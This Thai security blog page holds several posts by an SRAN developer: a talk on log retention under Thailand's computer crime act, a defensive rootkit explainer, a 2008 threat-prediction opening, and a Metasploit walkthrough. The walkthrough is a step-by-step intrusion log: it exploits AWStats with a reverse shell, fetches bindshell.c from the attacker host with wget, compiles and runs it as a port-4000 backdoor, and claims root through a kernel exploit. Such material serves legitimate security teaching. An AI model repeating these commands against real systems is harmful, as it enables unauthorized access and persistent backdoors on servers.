บรรยายการหาเทคโนโลยีมารองรับ พ.ร.บ. คอมพ์ฯ ที่กรมชลประทาน


วันที่ 11 มกราคม 2551 ได้บรรยายการหาเทคโนโลยีมารองรับ พ.ร.บ. คอมพ์ฯ โดยใช้ระบบ SRAN Security Center ทางเลือกใหม่ในการเก็บบันทึกข้อมูลจราจร ให้สอดคล้องกับ พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ให้กับ พนักงานที่ดูแลระบบไอที ทั่วประเทศของกรมชลประทาน บรรยายที่สำนักงานใหญ่กรมชลประทาน
ในการบรรยายในครั้งนี้ พูดถึง การเก็บ Log ตาม พ.ร.บ ตามความจำเป็นและพอเพียง
1. สาระสำคัญในการเก็บบันทึกข้อมูลจราจร (Log) เพื่อระบุตัวตน ใคร ทำอะไร ที่ไหน อย่างไร เวลาใด
2. เทคโนโลยีที่ใช้ให้สอดคล้องกับ พ.ร.บ คอมพิวเตอร์ และใช้งบประมาณแบบพอเพียง สะดวกในการใช้งาน ลดความซับซ้อน
2. ใช้เทคนิค NBA (Network Behaviors Analysis) และเทคนิค Flow Collector บนระบบ SRAN เพื่อจับเพื่อดูพฤติกรรมการใช้งานของเครื่อง Client ที่ออกสู่อินเตอร์เน็ท (ส่วนใหญ่ภัยคุกคาม ที่มีผลกระทบกับ กฏหมายฉบับนี้มักเกิดจากการใช้งานอินเตอร์เน็ท) ทั้งที่เป็นข้อมูลปกติ และข้อมูลไม่ปกติ พร้อมทั้งการทำ Data Hashing การจัดทำ NTP (Time Server) และการยืนยันความไม่เปลี่ยนแปลงข้อมูลจราจรที่เก็บบันทึกไว้
3. ใช้ syslog server เก็บ Log เฉพาะ เครื่องแม่ข่ายที่สำคัญ และอุปกรณ์ที่สำคัญ
เพื่อรองรับใน มาตรา 3 และ มาตรา 26
4. อธิบายแนวคิด Hybrid Log Recorder นับได้ว่าเป็นที่แรกที่ได้บรรยายแนวคิดนี้

นนทวรรธนะ สาระมาน
Nontawattana Saraman

บรรยายการหาเทคโนโลยีมารองรับ พ.ร.บ. คอมพ์ฯ ที่กรมชลประทาน

 


วันที่ 11 มกราคม 2551 ได้บรรยายการหาเทคโนโลยีมารองรับ พ.ร.บ. คอมพ์ฯ โดยใช้ระบบ SRAN Security Center ทางเลือกใหม่ในการเก็บบันทึกข้อมูลจราจร ให้สอดคล้องกับ พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ให้กับ พนักงานที่ดูแลระบบไอที ทั่วประเทศของกรมชลประทาน บรรยายที่สำนักงานใหญ่กรมชลประทาน

ในการบรรยายในครั้งนี้ พูดถึง การเก็บ Log ตาม พ.ร.บ ตามความจำเป็นและพอเพียง
1. สาระสำคัญในการเก็บบันทึกข้อมูลจราจร (Log) เพื่อระบุตัวตน ใคร ทำอะไร ที่ไหน อย่างไร เวลาใด
2. เทคโนโลยีที่ใช้ให้สอดคล้องกับ พ.ร.บ คอมพิวเตอร์ และใช้งบประมาณแบบพอเพียง สะดวกในการใช้งาน ลดความซับซ้อน
2. ใช้เทคนิค NBA (Network Behaviors Analysis) และเทคนิค Flow Collector บนระบบ SRAN เพื่อจับเพื่อดูพฤติกรรมการใช้งานของเครื่อง Client ที่ออกสู่อินเตอร์เน็ท (ส่วนใหญ่ภัยคุกคาม ที่มีผลกระทบกับ กฏหมายฉบับนี้มักเกิดจากการใช้งานอินเตอร์เน็ท) ทั้งที่เป็นข้อมูลปกติ และข้อมูลไม่ปกติ พร้อมทั้งการทำ Data Hashing การจัดทำ NTP (Time Server) และการยืนยันความไม่เปลี่ยนแปลงข้อมูลจราจรที่เก็บบันทึกไว้
3. ใช้ syslog server เก็บ Log เฉพาะ เครื่องแม่ข่ายที่สำคัญ และอุปกรณ์ที่สำคัญ
เพื่อรองรับใน มาตรา 3 และ มาตรา 26
4. อธิบายแนวคิด Hybrid Log Recorder นับได้ว่าเป็นที่แรกที่ได้บรรยายแนวคิดนี้

ภัยคุกคามที่มองไม่ Invisible Threat


หลังปีใหม่ไม่กี่วัน ผมได้จัดข้อมูลในคอมพิวเตอร์ใหม่ ได้พบบทความที่ได้เขียนไว้ เมื่อหลายปีและคิดว่ายังคงได้สาระความรู้อยู่ในยุคปัจจุบันจึงนะมาให้อ่านกัน
ภัยคุกคามที่มองไม่ (Invisible Threat)
ภัยคุกคามเป็นเรื่องต้องระวังอยู่ตลอดเวลา พูดง่ายๆว่าต้องมีสติในการใช้งาน ครั้งนี้ผมจะกล่าวถึงภัยคุกคามชนิดหนึ่ง ที่มองด้วยตาเปล่าไม่เห็น เป็นภัยคุกคามบนระบบคอมพิวเตอร์นี้เองครับ และเป็นศัพท์เทคนิคที่หลายคนยังสับสนอยู่ว่าคืออะไรกันแน่ “Root Kit” โดยผมแบ่งหัวข้อไว้ดังนี้
1.ชนิดของ Rootkit
2.การตรวจหา rootkit
3.การกำจัด rootkit
4.ความแตกต่างของ Rootkit ไวรัสคอมพิวเตอร์และเวิร์ม
5. rootkit ที่ดาวน์โหลดได้ในอินเทอร์เน็ต

1. ชนิดของ rootkit
rootkit มีสามแบบด้วยกันคือ rootkit ในระดับ kernel, library และ application ในระดับ kernel rootkit เพิ่มโค้ดและ/หรือแทนที่บางส่วนของโค้ดของ kernel ด้วยโค้ดที่แก้ไขแล้วเพื่อช่วยในการซ่อน backdoor ในระบบคอมพิวเตอร์ มักทำโดยการเพิ่มโค้ดใหม่เข้าไปใน kernel ผ่านทาง device driver หรือ loadable module เช่น Loadable Kernel Modules ในลีนุกซ์หรือ device drivers ในไมโครซอฟท์วินโดวส์ โดยทั่วไป kernel rootkit จะ แก้ไขหรือแทนที่ system calls ด้วยเวอร์ชั่นที่ซ่อนข้อมูลเกี่ยวกับผู้โจมตี ส่วน rootkit ในระดับ application อาจแทนที่ไฟล์ไบนารีของ application ด้วยไฟล์ปลอมที่ซ่อนโทรจันไว้ หรืออาจแก้ไขการทำงานของ application โดยใช้ hook, patch, inject code หรือวิธีอื่น ๆ rootkit ในระดับ kernel อาจมีอันตรายมากเนื่องจากตรวจพบได้ยากถ้าไม่ได้ใช้ซอฟท์แวร์ที่เหมาะสมเพื่อค้นหา

ตัวอย่าง
* Rootkit.com มีตัวอย่างของ rootkits จำนวนมาก
* Sony BMG ใช้ XCP (Extended Copy Protection) DRM ของ First 4 Internet

2. การตรวจหา rootkit
มีข้อจำกัดสำหรับโปรแกรมใด ๆ ที่พยายามตรวจหา rootkit ในขณะที่ rootkit กำลังทำงานอยู่ในระบบที่สงสัย rootkit เป็นชุดของโปรแกรมที่แก้ไขเครื่องมือและ library ที่ทุกโปรแกรมต้องใช้ rootkit บางตัวแก้ไข kernel ที่ทำงานอยู่ (ผ่านทาง loadable modules ในลีนุกซ์ และรูปแบบอื่น ๆ ในยูนิกซ์ ผ่านทาง VxD ซึ่งเป็น virtual external driver ในแพลตฟอร์มวินโดวส์ของไมโครซอฟท์) ปัญหาเบื้องต้นในการตรวจจับ rootkit คือเราไม่สามารถให้ความเชื่อถือระบบปฏิบัติการที่กำลังทำงานอยู่ได้ พูดในอีกแง่หนึ่งคือ การกระทำเช่นการดูรายชื่อโปรเซสที่กำลังทำงาน หรือรายชื่อไฟล์ทุกไฟล์ในไดเร็กทอรีหนึ่ง เราไม่สามารถเชื่อถือได้ว่ามันได้ทำงานอย่างที่ผู้ออกแบบตั้งใจให้เป็น ในปัจจุบันโปรแกรมตรวจ rootkit ที่ทำงานใน live system เป็นเพียงวิธีเดียวที่ได้ผลเนื่องจาก rootkit ยังไม่ได้รับการพัฒนาให้ซ่อนตัวมันอย่างเต็มที่

วิธีที่ดีและน่าเชื่อถือที่สุดสำหรับการตรวจหา rootkit คือการปิดคอมพิวเตอร์ที่สงสัยว่าถูกติดตั้ง rootkit แล้วจึงตรวจพื้นที่เก็บข้อมูลโดยการบู๊ต (boot) จากสื่ออื่น (เช่น rescue CD-ROM, USB flash drive) rootkit ที่ไม่ได้ทำงานอยู่จะไม่สามารถซ่อนตัวเองได้ และโปรแกรมแอนตี้ไวรัสจะสามารถค้นหา rootkit ที่ติดตั้งผ่านทาง OS calls มาตรฐาน (ซึ่งน่าจะถูกแก้ไขโดย rootkit) และ query ในระดับต่ำ ซึ่งยังน่าเชื่อถือได้ rootkit พยายามป้องกันจากการค้นพบโดยการเฝ้าดูโปรเซสที่ทำงานอยู่และหยุดกิจกรรมของพวกมันจนกระทั่งการสแกนเสร็จสิ้น เนื่องจาก rootkit scanner ไม่สามารถค้นหา malware ที่ไม่มีระบบซ่อนตัวเองได้

ผู้ผลิตภัณฑ์ด้านความปลอดภัยได้แก้ไขปัญหาโดยการรวมระบบตรวจจับ rootkit ลงไปในผลิตภัณฑ์แอนตี้ไวรัสแบบดั้งเดิม ถ้า rootkit ตัดสินใจที่จะซ่อนตัวเองในระหว่างขั้นตอนการสแกน มันจะถูกตรวจพบโดยซอฟท์แวร์ตรวจจับการซ่อนตัวเอง แต่ถ้ามันตัดสินใจที่จะยกเลิกการโหลดเข้าสู่ระบบ แอนตี้ไวรัสแบบดั้งเดิมก็สามารถค้นหาพบได้โดยการตรวจจาก fingerprint การป้องกันที่ใช้ทั้งสองวิธีแบบนี้อาจบังคับผู้โจมตีให้ใช้ระบบตอบโต้การโจมตี (เรียกว่า retro routines) ในโค้ดของ rootkit ที่จะบังคับให้ลบซอฟท์แวร์ด้านความปลอดภัยออกจากหน่วยความจำ ทำให้โปรแกรมแอนตี้ไวรัสไม่สามารถทำงานได้ เช่นเดียวกันกับไวรัสคอมพิวเตอร์

มีหลายโปรแกรมที่สามารถตรวจจับ rootkit ในระบบยูนิกซ์มีโปรแกรมสองตัวที่นิยมใช้คือ chkrootkit และ rkhunter สำหรับแพลตฟอร์มวินโดวส์ มีโปรแกรมฟรีสำหรับใช้ส่วนบุคคลชื่อ Blacklight เป็นเวอร์ชั่นเบต้าในเว็บไซต์ของ F-Secure อีกโปรแกรมหนึ่งคือ Rootkit Revealer จาก Sysinternals มันจะตรวจจับ rootkit ที่มีทั้งหมดในปัจจุบันโดยการเปรียบเทียบผลที่ได้จากระบบปฏิบัติการกับผลที่ได้จากการอ่านดิสก์ อย่างไรก็ตามrootkit บางตัวใช้การเพิ่มโปรแกรมเหล่านี้เข้าไปในรายการของไฟล์ที่มันไม่ได้ซ่อนไว้ ดังนั้นเมื่อ rootkit ทำให้ไม่เกิดความแตกต่างระหว่างรายการไฟล์ทั้งสองรายการ โปรแกรมตรวจจับจึงไม่รายงานความผิดปกติ อย่างไรก็ตามการเปลี่ยนชื่อไฟล์ rootkitrevealer.exe เป็นชื่อแบบสุ่มสามารถเอาชนะฟีเจอร์นี้ของ rootkit ได้ ในรีลีสล่าสุดของ Rkdetector และ Rootkit Revealer มีฟีเจอร์ที่เปลี่ยนชื่อไฟล์อยู่แล้วดังนั้นจึงไม่จำเป็นต้องเปลี่ยนชื่อไฟล์ด้วยตัวคุณเองอีกต่อไป

Chkrootkit
http://www.chkrootkit.org/
Rkhunter
http://www.rootkit.nl/
Blacklight
http://www.f-secure.com/blacklight/
Rootkit Revealer
http://www.sysinternals.com/Utilities/RootkitRevealer.html
Rkdtector
http://www.rootkitdetector.com/

หลักการป้องกันไว้ดีกว่าแก้ยังใช้ได้เสมอ ถ้าคุณเชื่อในความถูกต้องของแผ่นติดตั้งของระบบ คุณสามารถใช้การเข้ารหัสเพื่อเฝ้าดูความถูกต้องของระบบ โดยการทำ fingerprinting ไฟล์ระบบทันทีหลังจากมีการติดตั้งระบบใหม่ ๆ และทำอีกครั้งเมื่อมีการเปลี่ยนแปลงไฟล์ระบบ (เช่น การติดตั้งซอฟท์แวร์ใหม่) ทำให้คุณรู้ได้เมื่อมีการเปลี่ยนแปลงที่เป็นอันตรายกับไฟล์ระบบของคุณ ในขั้นตอนการทำ fingerprint จะมีการใช้ cryptographic hash function เพื่อสร้างตัวเลขที่มีความยาวจำกัด มีเอกลักษณ์เฉพาะขึ้นอยู่กับทุกบิตของข้อมูลที่มีในไฟล์ที่ทำ fingerprint คุณสามารถตรวจจับการเปลี่ยนแปลงใด ๆ กับไฟล์เหล่านี้ที่คุณไม่ได้ทำ โดยการคำนวณและเปรียบเทียบค่า hash (หรือ fingerprint) ของไฟล์เป็นระยะ ๆ

3. การกำจัด rootkit
มีความคิดที่เชื่อว่าการกำจัด rootkit ออกจากระบบไม่สามารถทำได้ ถึงแม้จะรู้ถึงลักษณะที่แท้จริงและองค์ประกอบของ rootkit ก็ตาม การใช้เวลาและความพยายามของผู้ดูแลระบบโดยใช้ทักษะหรือประสบการณ์ที่จำเป็นเพื่อการติดตั้งระบบปฏิบัติการใหม่ตั้งแต่ต้นเป็นทางเลือกที่ดีกว่า

Rootkit Question
http://forums.spywareinfo.com/lofiversion/index.php/t52360.html

มีวิธีการลบ rootkit โดยการใช้ filesystem driver เมื่อระบบกำลังทำงานอยู่ Rkdetector v2.0 ใช้วิธีลบไฟล์ที่ซ่อนอยู่เมื่อระบบกำลังทำงานอยู่โดยใช้ NTFS และ FAT32 filesystem driver ของมันเอง หลังจากลบไฟล์และระบบบู๊ตขึ้นมาใหม่แล้ว ไฟล์ของ rootkit จะไม่สามารถโหลดขึ้นมาได้เพราะข้อมูลที่มีอยู่เสียหายไปแล้ว

4. ความแตกต่างของ Rootkit ไวรัสคอมพิวเตอร์และเวิร์ม
ความแตกต่างหลัก ๆ ของไวรัสคอมพิวเตอร์และ rootkit คือการแพร่กระจาย ไวรัสคอมพิวเตอร์เหมือน rootkit ตรงที่พวกมันแก้ไขซอฟท์แวร์ที่เป็นองค์ประกอบหลักของระบบ โดยการใส่โค้ดที่พยายามซ่อนการติดตั้ง และช่วยเพิ่มฟีเจอร์หรือ service บางอย่างให้กับผู้โจมตี (เป็น payload ของไวรัส)

ในกรณีของ rootkit payload อาจพยายามรักษาความถูกต้องสมบูรณ์ของ rootkit (การพยายามควบคุมระบบ)เช่น ทุกครั้งที่ผู้ใช้ใช้คำสั่ง ps ที่เป็นของ rootkit มันอาจตรวจ copy ของ init และ inetd ในระบบเพื่อให้แน่ใจว่าระบบยังคงถูกควบคุมโดย rootkit อยู่ และอาจติดตั้ง rootkit ลงในระบบอีกครั้งตามความจำเป็น ส่วนที่เหลือของ payload มีไว้เพื่อตรวจให้แน่ใจว่าผู้บุกรุกยังคงควบคุมระบบอยู่ โดยทั่วไปรวมถึงการมี backdoor ในรูปแบบของ username /password ที่สามารถเข้าสู่ระบบได้ command-line switch ที่ซ่อนไว้ หรือ environment variable พิเศษซึ่งสามารถหลบหลีกระบบ access control policy ของโปรแกรมที่ไม่ได้ถูกแก้ไขโดย rootkit ได้ rootkit บางตัวอาจเพิ่มการตรวจ port knocking เข้าไปใน network daemon (services) เช่น inetd หรือ sshd

port knocking วิธีการเปิดพอร์ตในไฟร์วอลล์โดยการสร้างความพยายามในการเชื่อมโยงเข้าไปที่พอร์ตที่ปิดอยู่ตามที่กำหนดไว้ หลังจากที่ได้รับความพยายามในการเชื่อมโยงตามลำดับที่ถูกต้องมาแล้ว จะมีการแก้ไขข้อบังคับของไฟร์วอลล์อนุญาตให้โฮสต์นั้นสามารถเชื่อมโยงกับพอร์ตนั้นได้)

ไวรัสคอมพิวเตอร์อาจมี payload แบบใดก็ได้ อย่างไรก็ตาม ไวรัสคอมพิวเตอร์อาจพยายามแพร่กระจายไปยังระบบอื่นอีกด้วย ส่วน rootkit นั้นโดยทั่วไปแล้วจะจำกัดอยู่ที่การควบระบบเพียงระบบเดียวเท่านั้น

โปรแกรมหนึ่งหรือชุดโปรแกรมที่พยายามสแกนเครือข่ายเพื่อหาระบบที่มีช่องโหว่ โจมตีช่องโหว่และบุกรุกเข้าระบบเหล่านั้นโดยอัตโนมัติ เรียกว่า หนอนคอมพิวเตอร์ (computer worm) รูปแบบอื่น ๆ ของหนอนคอมพิวเตอร์อาจทำงานในลักษณะ passive เช่น ดักจับข้อมูล username และ password และใช้ข้อมูลนี้เพื่อบุกรุกแอคเคาท์ ติดตั้งสำเนาของตัวมันเองลงไปในแต่ละแอคเคาท์ (และมักส่งข้อมูลแอคเคาท์กลับมายังผู้บุกรุกผ่านทาง covert channel)

covert channel หมายถึงช่องการสื่อสารใด ๆ (channel) ที่สามารถถูกใช้ประโยชน์โดยโปรเซสหนึ่ง เพื่อส่งผ่านข้อมูลข่าวสารในลักษณะที่ละเมิดข้อกำหนดในการรักษาความปลอดภัยของระบบ

นอกจากนี้ยังมีซอฟท์แวร์มุ่งร้ายแบบ hybrid หนอนอินเทอร์เน็ตอาจติดตั้ง rootkit และ rootkit อาจทำมีสำเนาของหนอนอินเทอร์เน็ต, packet sniffer หรือ pot scanner หนึ่งตัวหรือมากกว่า นอกจากนี้ยังมีหนอนอินเทอร์เน็ตที่แพร่กระจายผ่านอีเมล ที่โจมตีแพลตฟอร์มไมโครซอฟท์วินโดวส์โดยเฉพาะ ที่มักเรียกกันว่าไวรัส ดังนั้นคำเหล่านี้จึงมักใช้คาบเกี่ยวกัน และถูกเหมารวมได้ง่าย

5. rootkit ที่ดาวน์โหลดได้ในอินเทอร์เน็ต
rootkit ก็เหมือนกับซอฟท์แวร์อื่น ๆ ที่ใช้โดยผู้โจมตี มีเครื่องมือหลายตัวที่ใช้ร่วมกันหลายคน และหาได้ง่ายในอินเทอร์เน็ต ไม่ใช่เรื่องแปลกที่จะพบระบบที่ถูกบุกรุกที่ถูกติดตั้ง rootkit ซับซ้อนที่สามารถหาได้ในอินเทอร์เน็ต แต่ซ่อนหนอนอินเทอร์เน็ตที่ไม่ซับซ้อน หรือเครื่องมือที่ดูเหมือนจะเขียนโดยโปรแกรมเมอร์ที่ไม่มีประสบการณ์

rootkit ส่วนใหญ่ที่หาได้ในอินเทอร์เน็ตมักสร้างเป็นโปรแกรมพิสูจน์ความคิด (proof of concept) เพื่อทดลองแนวคิดใหม่ในการซ่อนสิ่งที่ต้องการในระบบคอมพิวเตอร์ อย่างก็ตามเนื่องจากเป็นการทดลอง พวกเขาจึงมักจะไม่ได้ทำให้ rootkit สามารถซ่อนตัวได้อย่างสมบูรณ์ เมื่อใช้ rootkit เพื่อการโจมตีจึงอาจมีประสิทธิภาพมาก แต่อย่างไรก็ตาม เมื่อ rootkit ถูกค้นพบ เช่น โดยการเริ่มต้นระบบปฏิบัติการจากสื่อที่เชื่อถือได้ เช่น ซีดี จึงมักแสดงให้เห็นถึงร่องรอยของ rootkit เหล่านี้ เช่น มีไฟล์ที่ชื่อ rootkit ในไดเร็กทอรีทั่ว ๆ ไปในระบบคอมพิวเตอร์นั้น

นายนนทวรรธนะ สาระมาน
Nontawattana Saraman
ทีมพัฒนาวิจัย SRAN

ความน่าสนใจของ Metasloit

Metasploit เป็นเครื่องมือแบบ open source ที่สามารถใช้เพื่อพัฒนา ทดสอบ และใช้ exploit
# wget http://www.metasploit.com/tools/framework-2.5.tar.gz
–12:48:57– http://www.metasploit.com/tools/framework-2.5.tar.gz
=> `framework-2.5.tar.gz’
Resolving www.metasploit.com… 66.234.161.200
Connecting to www.metasploit.com|66.234.161.200|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,625,719 (2.5M) [application/x-gzip]

100%[========================================================================================>] 2,625,719 11.23K/s ETA 00:00

12:53:14 (10.05 KB/s) – `framework-2.5.tar.gz’ saved [2625719/2625719]

แตกไฟล์โดยใช้คำสั่ง tar
# tar -zxvf framework-2.5.tar.gz
framework-2.5/
framework-2.5/lib/
framework-2.5/lib/Msf/
framework-2.5/lib/Msf/Nop/
framework-2.5/lib/Msf/Nop/OptyNop2.pm
framework-2.5/lib/Msf/Nop/OptyNop2Tables.pm
framework-2.5/lib/Msf/PayloadComponent/
framework-2.5/lib/Msf/PayloadComponent/BSD/
framework-2.5/lib/Msf/PayloadComponent/BSD/ia32/

framework-2.5/extras/Term-ReadLine-Gnu-1.14.tar.gz
framework-2.5/msfcli
framework-2.5/msfweb
framework-2.5/msfpayload

เข้าไปในไดเร็กทอรี framework-2.5
# cd framework-2.5
[root@ca framework-2.5]# ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk

เรียก console
# ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ _/ __ ____ / ___/____ | | / _ | __
| Y Y ___/| | / __ ____ | |_> > |_( <_> ) || |
|__|_| /___ >__| (____ /____ >| __/|____/____/|__||__|
/ / / / |__|

+ — –=[ msfconsole v2.5 [105 exploits – 74 payloads]

พิมพ์ help เพื่อดู option ที่สามารถใช้ได้
msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

แสดง exploit ที่มี
msf > show exploits
Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution

เรียกใช้ exploit ที่โจมตี awstats
msf > use awstats_configdir_exec

msf awstats_configdir_exec(cmd_unix_reverse) > set RHOST 192.168.1.204
RHOST -> 192.168.1.204
msf awstats_configdir_exec(cmd_unix_reverse) > set DIR /cgi-bin/
DIR -> /cgi-bin/
msf awstats_configdir_exec(cmd_unix_reverse) > set LHOST 192.168.1.203
LHOST -> 192.168.1.203
msf awstats_configdir_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321

แสดง option ของ exploit
msf awstats_configdir_exec(cmd_unix_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
——– —— ————- ———————————–
optional SSL Use SSL
required RHOST 192.168.1.204 The target address
optional VHOST The virtual host name of the server
required DIR /cgi-bin/ Directory of awstats.pl script
required RPORT 80 The target port

Payload: Name Default Description
——– —— ————- ———————————–
required LHOST 192.168.1.203 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Targetless Exploit

แสดง payload
msf awstats_configdir_exec > show payloads

Metasploit Framework Usable Payloads
====================================

cmd_generic Arbitrary Command
cmd_irix_bind Irix Inetd Bind Shell
cmd_unix_reverse Unix Telnet Piping Reverse Shell

เซ็ต payload ให้เป็น cmd_unix_reverse
msf awstats_configdir_exec(cmd_generic) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf awstats_configdir_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Establishing a connection to the target…

Trying 192.168.1.203…

Escape character is ‘^]’.
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.1.203:4321 <-> 192.168.1.204:32796 192.168.1.203:4321 <-> 192.168.1.204:32797

id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/usr/local/awstats/wwwroot/cgi-bin

ดาวน์โหลด bindshell.c ซึ่งเป็น backdoor ที่เปิดพอร์ต 4000 ไว้
cd /tmp
wget http://192.168.1.203/bindshell.c
–16:08:20– http://192.168.1.203/bindshell.c
=> `bindshell.c’
Connecting to 192.168.1.203 … connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,083 [text/plain]

0K .. 100% 135.61 KB/s

16:08:20 (135.61 KB/s) – `bindshell.c’ saved [2083/2083]

ls
bindshell.c
ssh-GDMM1551
ssh-dovU4939
gcc -o bindshell bindshell.c
ls
bindshell
bindshell.c
ssh-GDMM1551
ssh-dovU4939
./bindshell
Daemon is starting…OK, pid = 1648

Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.

msf awstats_configdir_exec(cmd_unix_reverse) > exit

telnet เข้าไปที่พอร์ต backdoor
# telnet 192.168.1.204 4000
Trying 192.168.1.204…
Connected to www.sran.net (192.168.1.204).
Escape character is ‘^]’.
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$ sh-2.05b$ ls -al
total 204
drwxr-xr-x 19 root root 4096 Dec 16 15:18 .
drwxr-xr-x 19 root root 4096 Dec 16 15:18 ..
-rw-r–r– 1 root root 0 Dec 16 15:18 .autofsck
drwxr-xr-x 2 root root 4096 Nov 28 12:23 bin
drwxr-xr-x 3 root root 4096 Nov 28 10:53 boot
drwxr-xr-x 21 root root 118784 Dec 16 15:19 dev
drwxr-xr-x 47 root root 4096 Dec 16 15:19 etc
drwxr-xr-x 5 root root 4096 Dec 1 11:25 home
drwxr-xr-x 2 root root 4096 Oct 7 2003 initrd
drwxr-xr-x 8 root root 4096 Nov 28 12:22 lib
drwx—— 2 root root 16384 Nov 28 05:45 lost+found
drwxr-xr-x 2 root root 4096 Sep 8 2003 misc
drwxr-xr-x 4 root root 4096 Nov 28 11:12 mnt
drwxr-xr-x 2 root root 4096 Oct 7 2003 opt
dr-xr-xr-x 60 root root 0 Dec 16 10:18 proc
drwxr-x— 3 root root 4096 Dec 16 13:13 root
drwxr-xr-x 2 root root 8192 Nov 28 12:23 sbin
drwxrwxrwt 4 root root 4096 Dec 16 16:08 tmp
drwxr-xr-x 15 root root 4096 Nov 28 10:50 usr
drwxr-xr-x 18 root root 4096 Nov 28 10:56 var
sh-2.05b$ sh-2.05b$ cd /var/tmp
sh-2.05b$ sh-2.05b$ ls -al
total 8
drwxrwxrwt 2 root root 4096 Dec 15 14:59 .
drwxr-xr-x 18 root root 4096 Nov 28 10:56 ..
sh-2.05b$ sh-2.05b$ uname -a
Linux app.sran.org 2.4.22-1.2115.nptl #1 Wed Oct 29 15:20:17 EST 2003 i586 i586 i386 GNU/Linux

เมื่อได้ user ในระบบเป็น apache แล้วผมจึงพยายามต่อไปเพื่อให้ได้สิทธิ์ของ root การที่ระบบนี้ใช้ Linux kernel เวอร์ชั่นเก่าทำให้ไม่ยากที่จะหา exploit เพื่อโจมตีช่องโหว่ใน kernel และผมก็ได้ root ในที่สุด

นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev

ทำนาย 10 ภัยคุกคามทางอินเตอร์เน็ท 2008

ใกล้หมดปีไปอีกครั้งแล้วนะครับ ใครตั้งใจจะทำอะไรไว้ ยังไม่ได้ทำภายในปีนี้ก็ขอให้เรียบๆทำกันไว้ เวลานั้นไม่เคยคอยใคร พอใกล้หมดปี ก็มักจะมีคำทำนายในเรื่องต่างๆ เช่นกันในปีหน้า ภัยคุกคามในรูปแบบใหม่ๆ ที่อาจจะเกิดขึ้นในปี 2008 จะเป็นอย่างไรบ้างลองรับฟังกันดูเผื่อไว้ว่าจะช่วยในการป้องกัน กันได้ทัน เท่าที่ผ่านมาได้ค้นหาข้อมูลเกี่ยวกับภัยคุกคามทางอินเตอร์เน็ทในรูปแบบ ใหม่ๆ พบว่ามีหลายสำนักได้ตั้งข้อสังเกตไว้พอสมควร โดยเฉพาะเจ้าแรกที่กล้าออกมาทำนาย นั้นคือ Mcafee ยักษ์ใหญ่ในวงการ IT Security ระดับโลก ในทีมงาน SRAN ก็ได้เขียนทำนายไว้เช่นกัน ซึ่งมีความใกล้เคียงกับทาง Mcafee และคิดว่าในปี 2008 ภัยคุกคาม จะเน้นในเรื่องความเป็นส่วนตัวมากขึ้น ข้อมูลที่เป็นข้อมูลส่วนบุคคล ความประมาทในการใช้งานของ User รวมถึงอาชญากรรมคอมพิวเตอร์ ในรูปแบบต่างๆ ที่ทวีความซับซ้อน จะแบ่งหมวดหมู่ภัยคุกคามได้ดังนี้ครับ
กลุ่มภัยคุกคามที่พบในปี 2008
กลุ่มที่ 1 กองทัพ botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

กลุ่มที่ 2 ช่องโหว่ของระบบปฏิบัติการ
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท
กลุ่มที่ 1 กองทัพ Botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

ภัยคุกคามอันดับที่ 1 Storm Worm : อาชญกรทางคอมพิวเตอร์ จะใช้เทคนิคการสร้าง Storm Worm เพื่อกลบเกลื่อนร่องรอย สร้างสายพันธ์ของ worm ในการเปลี่ยนโค้ดที่ทำให้ระบบซอฟต์แวร์ Anti virus ไม่สามารถตรวจจับได้ ซึงการเกิด Storm Worm นั้นเป็นการติดโปรแกรมไม่พึ่งประสงค์ บนเจตนาของผู้บุกรุกที่สร้างขึ้น โปรแกรมไม่พึ่งสงค์เรียกอีกอย่างหนึ่งว่า “malware” คือซอฟต์แวร์ที่สูญเสีย C (Confidentiality) I (Integrity) และ A (Availability) อย่างใดอย่างหนึ่ง หรือ ทั้งหมด จนทำให้เกิดเป็น Virus , Worm , Trojan , Spyware , Backdoor และ Rootkit ซึ่ง Storm worm เป็นลักษณะการแพร่กระจายสายพันธ์ ที่มีการเปลี่ยนแปลงโค้ด ทำให้เกิดความเสียหายกับเครื่องที่ติด worm เหล่านี้ ผลลัพธ์ของ Storm worm คือเครื่องที่ติด worm ชนิดเหล่านี้จะถูกเรียกว่า “Zombie” ที่พร้อมที่จะควบคุมให้ทำการใดการหนึ่ง เช่น การส่ง Spam , การโจมตีชนิดที่เรียกว่า DDoS/DoS เป็นต้น หาก Zombie จำนวนมากกว่า 1 เครื่อง ก็เรียกว่า Botnet 